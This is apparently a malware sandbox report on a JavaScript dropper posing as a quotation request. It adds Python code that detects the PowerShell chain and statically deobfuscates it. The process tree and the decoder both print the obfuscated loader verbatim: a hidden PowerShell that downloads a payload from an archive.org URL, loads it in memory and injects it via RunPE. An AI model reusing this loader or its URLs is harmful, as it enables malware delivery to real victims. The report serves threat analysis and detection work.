Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-09-2024 13:32

General

  • Target

    REQUEST FOR QUOTATION.js

  • Size

    318KB

  • MD5

    08dab38ef2c8bdada3b4928145b777f7

  • SHA1

    8d9fe403c417c9fc50ed09528dd2b096ebfe6375

  • SHA256

    cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41

  • SHA512

    52aeb79f20660946bb7095addb26de8f115d29c4b15cd8169418d73db102c4ca7f79096780baa896357efe40999957969631b718557fd7c35e7375a2288ea5d5

  • SSDEEP

    6144:ae3G0HrhDz6LXUo09qGOWIC5pbyo68vh146TIVdDfo+IitZsVAsuG7EEqZ1Cr81b:Zr81VpOhEUX7dyIUwRjsSXKs0AUUbPMz

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request (2 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Run PowerShell and hide display window.

  • Command and Scripting Interpreter: JavaScript (1 TTP)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)
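
The signatures above reduce to a handful of process-creation features: a script host (wscript.exe) spawning powershell.exe, `-windowstyle hidden` and `-executionpolicy bypass` on the command line, an inline base64 decode, and an Invoke-Expression alias built from `$VerbosePreference`. The following is an added example, not part of the sandbox report, that scores constructed Sysmon-style events modelled on this process tree. The field names (`pid`, `ppid`, `image`, `cmd`), the placeholder standing in for the base64 blob, the truncated stage-3 command line and the benign control event (PID 3001) are all assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon event 1 style fields) modelled on the
# tree in this report: the base64 blob is a placeholder, the stage-3 command line is
# truncated, and PID 3001 is an invented benign control. Not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 2708, "ppid": 1500, "image": r"C:\Windows\system32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"'},
    {"pid": 2720, "ppid": 2708, "image": PS,
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '
            r"'<base64-blob>';$OWjuxD = [system.Text.encoding]::Unicode.GetString("
            r"[system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden "
            r"-executionpolicy bypass -NoProfile -command $OWjuxD"},
    {"pid": 2896, "ppid": 2720, "image": PS,
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden '
            r'-executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]'
            r"+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+ (truncated)"},
    {"pid": 3001, "ppid": 1500, "image": PS,
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line indicators, case-insensitive because PowerShell switches are.
CMDLINE_RULES = {
    "hidden_window":    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),        # -w hidden / -windowstyle hidden
    "policy_bypass":    re.compile(r"-e\w*\s+bypass", re.I),                     # -ep / -ex / -executionpolicy bypass
    "base64_payload":   re.compile(r"FromBase64String|-e(?:c|nc\w*)\s", re.I),  # inline decode or -enc <b64>
    "reflective_load":  re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "iex_from_prefvar": re.compile(r"\$\w*preference\)?\[\s*\d", re.I),        # ([string]$VerbosePreference)[1,3]
}


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def evaluate(event: dict, parent) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    if basename(event["image"]) != "powershell.exe":
        return hits
    if parent is not None and basename(parent["image"]) in SCRIPT_HOSTS:
        hits.append("script_host_spawns_powershell")
    hits += [name for name, rx in CMDLINE_RULES.items() if rx.search(event["cmd"])]
    return hits


def triage(events: list) -> dict:
    """Resolve each event's parent by pid and evaluate the whole batch."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: evaluate(e, by_pid.get(e["ppid"])) for e in events}


def is_suspicious(hits: list) -> bool:
    """Alert on a script-host parent alone, or on any two command-line indicators."""
    return "script_host_spawns_powershell" in hits or len(hits) >= 2


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, "ALERT" if is_suspicious(hits) else "ok", hits)
```

Note the stage-3 event (PID 2896): `FromBase64String` and `[Reflection.Assembly]::Load` are split across `'..'+'..'` fragments in the captured command line, so rules that match those literals fire on the parent (PID 2720) but not here. The hidden-window and bypass switches and the preference-variable alias are structural and survive the obfuscation, which is why the verdict does not depend on any single string.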

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
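
To reconstruct what the three stages in the tree do without executing them: stage 1 base64-decodes a UTF-16LE string into `$OWjuxD`, stage 2 runs it with the window hidden and the execution policy bypassed, and stage 3 rebuilds a script from `'..'+'..'` fragments, swaps `F04` for `$` and `nKr` for a single quote, and hands the result to `ieX` (Invoke-Expression, spelled from `([string]$VerbosePreference)[1,3]+'X'`, which picks `i` and `e` out of the default value `SilentlyContinue`). The Python below is an added example, not code from the report or from the sample; it carries the stage-3 argument copied from the process tree through those steps statically. The stage-1 blob is not reproduced in the report, so only the decoder is shown, with a constructed input. The last argument passed to `RunPE.Home.VAI` is reversed here only because reversing it yields a URL; that VAI actually downloads from it is an assumption, since the .NET assembly itself is not analysed on this page.

```python
import base64
import re

# Stage-3 argument copied verbatim from the process tree above (the outer
# powershell.exe -command "..." wrapper is dropped).
STAGE3_EXPR = (
    ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'"
    "+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'"
    "+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'"
    "+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'"
    "+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'"
    "+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'"
    "+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'"
    "+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'"
    "+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'"
    "+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'"
    "+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
)


def decode_stage1(b64_utf16: str) -> str:
    """Stage 1: $Codigo is base64 of UTF-16LE text ([Text.Encoding]::Unicode)."""
    return base64.b64decode(b64_utf16).decode("utf-16-le")


# Default values of the automatic preference variables the alias trick indexes into.
PS_DEFAULTS = {"verbosepreference": "SilentlyContinue", "debugpreference": "SilentlyContinue"}
ALIAS_RE = re.compile(r"\$(\w+)\)\s*\[([\d,\s]+)\]\s*\+\s*'([^']*)'")


def resolve_iex_alias(invoker: str) -> str:
    """([string]$VerbosePreference)[1,3]+'X' -join '' spells 'ieX' (Invoke-Expression)."""
    m = ALIAS_RE.search(invoker)
    value = PS_DEFAULTS.get(m.group(1).lower()) if m else None
    if value is None:
        return invoker                      # unknown construction: hand it back untouched
    picked = "".join(value[int(i)] for i in m.group(2).split(","))
    return picked + m.group(3)


INVOKE_RE = re.compile(r"^\.\(\s*(?P<invoker>.*?)\)\s*\((?P<arg>.*)\)\s*$", re.S)
FRAGMENT_RE = re.compile(r"'((?:[^']|'')*)'")   # one single-quoted PowerShell literal
LITERAL = r"'[^']*'|(?:\[string\])?\[char\]\d+"
REPLACE_RE = re.compile(r"\.replace\(\s*(%s)\s*,\s*(%s)\s*\)" % (LITERAL, LITERAL), re.I)


def ps_literal(token: str) -> str:
    """'abc' -> abc ; [string][char]39 -> the single-quote character."""
    if token.startswith("'"):
        return token[1:-1].replace("''", "'")
    return chr(int(re.search(r"\d+", token).group()))


def join_fragments(concat_expr: str) -> str:
    """Collapse an 'a'+'b'+'c' chain into one string."""
    return "".join(ps_literal(m.group(0)) for m in FRAGMENT_RE.finditer(concat_expr))


def deobfuscate_stage3(expr: str) -> dict:
    """Split .( invoker )( argument ), join the fragments, apply the .Replace chain in order."""
    m = INVOKE_RE.match(expr)
    if not m:
        raise ValueError("not a .( invoker )( argument ) expression")
    arg = m.group("arg")
    calls = list(REPLACE_RE.finditer(arg))
    script = join_fragments(arg[:calls[0].start()] if calls else arg)
    for call in calls:                      # PowerShell .Replace is ordinal, like str.replace
        script = script.replace(ps_literal(call.group(1)), ps_literal(call.group(2)))
    return {"invoker": resolve_iex_alias(m.group("invoker")), "script": script}


URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
QUOTED_RE = re.compile(r"'([^']*)'")


def extract_iocs(script: str) -> dict:
    """Plain URLs, plus quoted literals that only become URLs when reversed."""
    flipped = [lit[::-1] for lit in QUOTED_RE.findall(script)]
    return {"urls": URL_RE.findall(script),
            "reversed_urls": [u for u in flipped if u.startswith(("http://", "https://"))]}


if __name__ == "__main__":
    result = deobfuscate_stage3(STAGE3_EXPR)
    print(result["invoker"])
    print(result["script"])
    print(extract_iocs(result["script"]))
```

The recovered script is the pattern summarised under Malware Config: fetch base64 text from the archive.org URL, decode it and `[Reflection.Assembly]::Load` the resulting .NET assembly inside the PowerShell process, then call `RunPE.Home.VAI` with a reversed URL, several `desativado` ("disabled") flags and the name `AddInProcess32`, which reads as the intended host process for whatever VAI retrieves (an assumption, not something the report confirms). Loading from memory is consistent with the Downloads list, which shows no dropped executable, only a jump-list entry and memory regions of PID 2720.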

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    7d640063c82b29e2ed7f9b469c5e315c

    SHA1

    d028c7d6b2f8a7502c2e17c45b1e85bf663995e8

    SHA256

    1d40fd898214bb3b223f33552f960ba1a4530ebe5a43927a31e9830e2037b2e9

    SHA512

    a9ee1103898467ffd0f3a363e87f19d5887eb042722c4dcbf459423db06567b3e76cb1988dff51c920b39be6f60724e0514530a34d5a33344f1d0d1cdfea4996

  • memory/2720-4-0x000007FEF4A1E000-0x000007FEF4A1F000-memory.dmp

    Filesize

    4KB

  • memory/2720-5-0x000000001B1B0000-0x000000001B492000-memory.dmp

    Filesize

    2.9MB

  • memory/2720-6-0x0000000002470000-0x0000000002478000-memory.dmp

    Filesize

    32KB

  • memory/2720-7-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-8-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-9-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-15-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-16-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB